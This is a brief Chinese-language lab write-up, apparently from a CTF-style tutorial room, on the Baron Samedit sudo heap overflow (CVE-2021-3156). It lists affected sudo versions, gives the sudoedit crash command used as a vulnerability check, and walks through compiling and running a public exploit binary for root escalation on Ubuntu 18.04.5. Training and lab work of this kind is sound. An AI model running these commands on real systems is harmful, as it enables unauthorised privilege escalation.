Baron Samedit(CVE-2021-3156)
A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series
Sudo 堆缓冲区溢出漏洞
受影响版本:
-
Sudo 1.8.2 - 1.8.31p2
-
Sudo 1.9.0 - 1.9.5p1
POC:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
(返回malloc(): memory corruption
Aborted (core dumped)则表示系统容易收到攻击)
EXP:
![](https://i-blog.csdnimg.cn/blog_migrate/e975c9e829bb5f5a0336359020df33ee.png)
POC:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
![](https://i-blog.csdnimg.cn/blog_migrate/64de866366ba782fc81a0fe04109dc92.png)
下载EXP,cd到Exploit目录,看到一个Makefile文件,输入make即可进行编译
运行程序时提示后面要加参数0/1/2
![](https://i-blog.csdnimg.cn/blog_migrate/b347acd5a2b7ef06a066996a74ee24c4.png)
我们是Ubuntu18.04.5,所以我们使用./sudo-hax-me-a-sandwich 0
![](https://i-blog.csdnimg.cn/blog_migrate/248b1f6fcff5b6215010876480f04a6b.png)